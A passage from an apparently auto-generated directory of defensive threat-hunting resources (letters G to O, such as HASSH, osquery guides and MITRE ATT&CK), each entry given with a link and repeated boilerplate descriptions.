What it does: Expert Investigation Guide - Threat Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Letter G

This letter section contains 1 tools.

Generating Hypotheses for Successful Threat Hunting

• Website: https://www.sans.org/reading-room/whitepapers/threats/generating-hypotheses-successful-threat-hunting-37172
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Generating Hypotheses for Successful Threat Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Letter H

This letter section contains 12 tools.

HASSH - a profiling method for SSH Clients and Servers

• Website: https://engineering.salesforce.com/open-sourcing-hassh-abed3ae5044c
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: HASSH - a profiling method for SSH Clients and Servers is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

HASSH @BSides Canberra 2019 - Slides

• Website: https://github.com/benjeems/Presentations/blob/master/BSides%202019%20%20-%20HASSH%20-%20a%20Profiling%20Method%20for%20SSH%20Clients%20and%20Servers.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: HASSH @BSides Canberra 2019 - Slides is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Have I Been Squatted

• Website: https://haveibeensquatted.com
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Have I Been Squatted is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A fast domain typosquatting detection tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

HeadPrint: Detecting Anomalous Communications through Header-based Application Fingerprinting

• Website: https://www.conand.me/publications/bortolameotti-headprint-2020.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: HeadPrint: Detecting Anomalous Communications through Header-based Application Fingerprinting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

HellsBells, Let's Hunt PowerShells!

• Website: https://www.splunk.com/blog/2017/07/06/hellsbells-lets-hunt-powershells.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: HellsBells, Let's Hunt PowerShells! is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > PowerShell.

Back to Name Jump

HTTP Client Fingerprinting Using SSL Handshake Analysis

• Website: https://www.ssllabs.com/projects/client-fingerprinting/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: HTTP Client Fingerprinting Using SSL Handshake Analysis is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: (source code:.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

HTTPS traffic analysis and client identification using passive SSL/TLS fingerprinting

• Website: https://link.springer.com/article/10.1186/s13635-016-0030-7
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: HTTPS traffic analysis and client identification using passive SSL/TLS fingerprinting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Hunt-Detect-Prevent

• Website: https://github.com/MHaggis/hunt-detect-prevent
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Hunt-Detect-Prevent is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Lists of sources and utilities to hunt, detect and prevent evildoers.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Hunting for PowerShell Using Heatmaps

• Website: https://medium.com/@jshlbrd/hunting-for-powershell-using-heatmaps-69b70151fa5d
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Hunting for PowerShell Using Heatmaps is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > PowerShell.

Back to Name Jump

Hunting the Known Unknowns (with DNS)

• Website: https://www.splunk.com/pdfs/events/govsummit/hunting_the_known_unknowns_with_DNS.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Hunting the Known Unknowns (with DNS) is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

Hunting the Known Unknowns (With PowerShell)

• Website: https://conf.splunk.com/files/2016/slides/hunting-the-known-unknowns-the-powershell-edition.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Hunting the Known Unknowns (With PowerShell) is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > PowerShell.

Back to Name Jump

Hunting with Sysmon

• Website: https://medium.com/@haggis_m/hunting-with-sysmon-38de012e62e6
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Hunting with Sysmon is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Letter I

This letter section contains 4 tools.

Introducing Event Query Language

• Website: https://www.elastic.co/blog/introducing-event-query-language
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Introducing Event Query Language is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Introducing the Funnel of Fidelity

• Website: https://posts.specterops.io/introducing-the-funnel-of-fidelity-b1bb59b04036
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Introducing the Funnel of Fidelity is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: ().

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Investigating Windows Endpoints

• Website: https://training.13cubed.com/investigating-windows-endpoints
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Investigating Windows Endpoints is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: by Richard Davis.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Trainings.

Back to Name Jump

Investigation Scenario

• Website: https://twitter.com/search?q=%23InvestigationPath%20from%3Achrissanders88&f=live
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Investigation Scenario is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: tweets by Chris Sanders.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Letter J

This letter section contains 1 tools.

JPCERT - Detecting Lateral Movement through Tracking Event Logs

• Website: https://blogs.jpcert.or.jp/en/2017/12/research-report-released-detecting-lateral-movement-through-tracking-event-logs-version-2.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: JPCERT - Detecting Lateral Movement through Tracking Event Logs is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

Back to Name Jump

Letter L

This letter section contains 1 tools.

Lessons Learned in Detection Engineering

• Website: https://medium.com/starting-up-security/lessons-learned-in-detection-engineering-304aec709856
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Lessons Learned in Detection Engineering is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A well experienced detection engineer describes in detail his observations, challenges, and recommendations for building an effective threat detection program.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Letter M

This letter section contains 9 tools.

MaGMa Use Case Defintion Model

• Website: https://www.betaalvereniging.nl/wp-content/uploads/FI-ISAC-use-case-framework-verkorte-versie.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: MaGMa Use Case Defintion Model is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A business-centric approach for planning and defining threat detection use cases.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

Markov Chain Fingerprinting to Classify Encrypted Traffic

• Website: https://drakkar.imag.fr/IMG/pdf/1569811033.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Markov Chain Fingerprinting to Classify Encrypted Traffic is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

MITRE ATT&CK

• Website: https://attack.mitre.org/wiki/Main_Page
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: MITRE ATT&CK is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

MITRE ATT&CK Navigator

• Website: https://mitre.github.io/attack-navigator/enterprise/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: MITRE ATT&CK Navigator is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: () - The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

MITRE CAR

• Website: https://car.mitre.org/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: MITRE CAR is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The Cyber Analytics Repository is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CK™) adversary model.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Detection Rules.

Back to Name Jump

MITRE Engage

• Website: https://engage.mitre.org/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: MITRE Engage is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A framework for planning and discussing adversary engagement operations that empowers you to engage your adversaries and achieve your cybersecurity goals.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

MITRE's Adversary Emulation Plans

• Website: https://attack.mitre.org/wiki/Adversary_Emulation_Plans
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: MITRE's Adversary Emulation Plans is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Back to Name Jump

Monitoring macOS hosts with osquery

• Website: https://blog.kolide.com/monitoring-macos-hosts-with-osquery-ba5dcc83122d
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Monitoring macOS hosts with osquery is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

Mordor

• Website: https://github.com/Cyb3rWard0g/mordor
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Mordor is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files. The data is categorized by platforms, adversary groups, tactics and techniques defined by the Mitre ATT&CK Framework.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

Letter N

This letter section contains 2 tools.

NIST Cybersecurity Framework

• Website: https://www.nist.gov/cyberframework
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection, Awesome SOC

What it does: NIST Cybersecurity Framework is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

NRD-db

• Website: https://github.com/StrackVibes/NRD-db
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: NRD-db is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Automatically fetches and stores newly registered domains in a Redis database.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Letter O

This letter section contains 7 tools.

On Botnets that use DNS for Command and Control

• Website: http://www.few.vu.nl/~herbertb/papers/feederbot_ec2nd11.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: On Botnets that use DNS for Command and Control is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Research Papers.

Back to Name Jump

On TTPs

• Website: http://ryanstillions.blogspot.com.au/2014/04/on-ttps.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: On TTPs is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Open Cybersecurity Schema Framework (OCSF)

• Website: https://github.com/ocsf/ocsf-schema
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Open Cybersecurity Schema Framework (OCSF) is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A framework for creating schemas and it also delivers a cybersecurity event schema built with the framework ().

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

osquery Across the Enterprise

• Website: https://medium.com/@palantir/osquery-across-the-enterprise-3c3c9d13ec55
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: osquery Across the Enterprise is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

osquery for Security — Part 1

• Website: https://medium.com/@clong/osquery-for-security-b66fffdf2daf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: osquery for Security — Part 1 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

osquery for Security — Part 2

• Website: https://medium.com/@clong/osquery-for-security-part-2-2e03de4d3721
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: osquery for Security — Part 2 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Advanced osquery functionality, File integrity monitoring, process auditing, and more.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

OSSEM

• Website: https://github.com/hunters-forge/OSSEM
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: OSSEM is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: (Open Source Security Events Metadata) - A community-led project that focuses on the documentation and standardization of security event logs from diverse data sources and operating systems.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.
